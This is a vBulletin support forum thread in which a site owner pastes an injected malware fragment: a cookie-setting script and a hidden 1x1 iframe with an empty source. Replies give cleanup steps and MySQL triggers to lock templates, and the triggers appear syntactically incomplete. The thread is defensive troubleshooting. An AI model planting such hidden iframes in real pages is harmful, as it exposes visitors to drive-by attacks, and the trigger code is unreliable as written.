No announcement yet.

Injected malware code

  • Filter
  • Time
  • Show
Clear All
new posts

  • Injected malware code

    My site got hacked last night or early this morning, and I'm having a heck of a time figuring out how to address the issue.

    I got warnings emailed to me from Google, and if you navigate to groundtradesxchange-dot-com, you'll likely get a big warning page before you'll need to agree to bypass to see any pages.

    But the injected code seems really tricky. I've actually only been able to spot it once via view source, and it seems once I see it on a page, I refresh that page and it's gone.

    Anyway - the injected code I found appeared before the html doctype declaration, and was the following:

    function SetCookie(cookieName,cookieContent){
     var cookiePath = '/';
     var expDate=new Date();
     expDate.setTime(expDate.getTime()+372800000)  ;
     var expires=expDate.toGMTString();
    SetCookie("pillaala", "ldladad");
    <iframe name="4" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src=""></iframe>
    What I don't understand is, where do I need to be looking to find where this script is residing? I've searched within the templates, languages and phrases to find even a piece of this code, and have come up empty, which makes me wonder if it's a server thing and not a vbulletin thing. And if that's the case, what should be my next step?

    I run other forums on the same server, and they appear unaffected. Possibly related, the unaffected forums are running v 3.8.1, and the affected forum is running v 3.6.8 pl2. (I know, I know. Upgrade. I will, once this is cleared up.)

    Any ideas where I should be looking?

    This injected code seems to come and go randomly, so I'm having a hard time pinning it down. The url where I was able to find it is here: but like I said, it only appeared once. But it shows up enough that Google has posted a warning in their search results and most current browsers post a warning before letting you go through to the page.

  • #2
    Sometimes it is in base64, so you can search for that in your code.

    Please don't PM or VM me for support - I only help out in the threads.
    vBulletin Manual & vBulletin 4.0 Code Documentation (API)
    Want help modifying your vbulletin forum? Head on over to
    If I post CSS and you don't know where it goes, throw it into the additional.css template.

    W3Schools &lt;- awesome site for html/css help


    • #3
      Here is a possible fix for this Malware

      This malware shows up intermittently. First, we need the at will ability to reproduce this malware error on the browser. This will help us to test if we have successfully cleaned malware.

      Use Google Chrome browser for the testing purpose. Simply clear all cache and browsing data in the Google Chrome browser. Then open the Chrome browser, access any thread in the forum to see that the request is redirected to the Malware warning page. Look at the page source of the Malware warning page to detect the code injection, search for the code in the vBulletin templates, delete the code injection in the appropriate template and lock down vBulletin templates to prevent any future change.

      Here are the steps to clear the cache and to get malware warning page -
      a.) Delete all cache and browsing data
      b.) Close all the sessions of Google Chrome browser.
      c.) Open new Google Chrome browser
      d.) After clearing the cache and browsing data one will get Malware warning page on almost every page in the forum.

      Next step involve finding the specific Malware code injection in the vBulletin template.
      a.) With the Malware warning in Google Chrome browser, click CTRL+U to 'View Source'.
      b.) In the page source, search for 'fratocseo'.
      c.) This malware has injected IFRAME into one of the templates. IFRAME code is usually inject in a heavily used template such as $footer, $header etc. I checked your site groundtradesxchange-dot-com and in your case the Malware is injected in the SHOWTHREAD vBulletin template. So now we know where the problem is.
      d.) Logon to the vBulletin AdminCP.
      e.) Goto 'Styles & Templates' > 'Search in Templates'.
      f.) In the 'Search for Text' enter 'showthread' and select 'Yes' radio button for 'Search Titles Only' > click on 'Find'> click on 'SHOWTHREAD'.
      g.) In your case, in line 1 of 'SHOWTHREAD' template, look for something which may look like "$fiiiika".
      h.) Delete "$fiiiika" from the 'SHOWTHREAD' template and click on 'Save and Reload'. This should clean the existing code in the template.
      i.) Again clear all cache and browsing data in Google Chrome browser (steps mentioned above).
      j.) Open a fresh Google Chrome browser session to go to the affected forum page again. This time the malware error will not show up, indicating that the malware has been removed successfully.

      But this fix will not prevent future injection of similar code in vBulletin templates. I could not find a way to freeze all changes to vBulletin Styles and Templates. Maybe someone in vBulletin Team could weigh in to suggest a way to freeze all changes to the Styles and Templates. In the meantime, here is a crude way to temporarily lock down vBulletin templates preventing any change to the templates. vBulletin templates are stored in the database table vb_template. Adding the following two triggers to the database will prevent all updates and inserts into the vb_template table. Also, just to be sure, keep a backup of table vb_template, which will be handy in case similar Malware injects any code in any template. Here is the simple code for the two database triggers.

      delimiter //
      CREATE TRIGGER vb_template_u
      before update ON vb_template
      update vb_template
      styleid = OLD.styleid
      ,title = OLD.title
      ,template = OLD.template
      ,template_un = OLD.template_un
      ,templatetype = OLD.templatetype
      ,dateline = OLD.dateline
      ,username = OLD.username
      ,version = OLD.version
      ,product = OLD.product
      where templateid = OLD.templateid ;
      delimiter ;

      delimiter //
      CREATE TRIGGER vb_template_i
      before insert ON vb_template
      delete from vb_template
      where templateid = NEW.templateid ;
      delimiter ;

      These two triggers will prevent any updates to the templates preventing future Malware injection to your website. If you would like to edit any vBulletin template, simply drop these triggers before editing the template, and to prevent future injection of IFRAME code simply recreate these triggers after you are done editing templates.

      Hope this is useful.

      Last edited by kapoor22; Sat 7th Aug '10, 5:09am.


      • #4
        What do you do if it's not in a template but in the database?


        • #5
          Then you remove it. Templates are in the database. If you see it in a template in the database, but not in the style manager, then you can save the template in the style manager and it should over write the stuff in the database.

          Please don't PM or VM me for support - I only help out in the threads.
          vBulletin Manual & vBulletin 4.0 Code Documentation (API)
          Want help modifying your vbulletin forum? Head on over to
          If I post CSS and you don't know where it goes, throw it into the additional.css template.

          W3Schools &lt;- awesome site for html/css help


          • #6
            malware problem

            I am having an issue right now with my vbulletin at: on every browser I try to load gives me a malware warning at my forums, I can't seem to figure it out either and all advertising is done in-house. I have delete several spam links at my site, and it appears that I have gotten rid of any spam bots from registering and getting around the captcha codes, but the malware issue is still there and I really need some help. If anyone thinks they can help me get rid of the problem I would greatly appreciate it. Should I get rid of my custom templates? What can be done for testing and what should be looked for in the code to remove any harful scripts?
            Play Online Texas Holdem Poker? Checkout my Texas Holdem Poker Forums and get Online Poker Bonuses


            widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.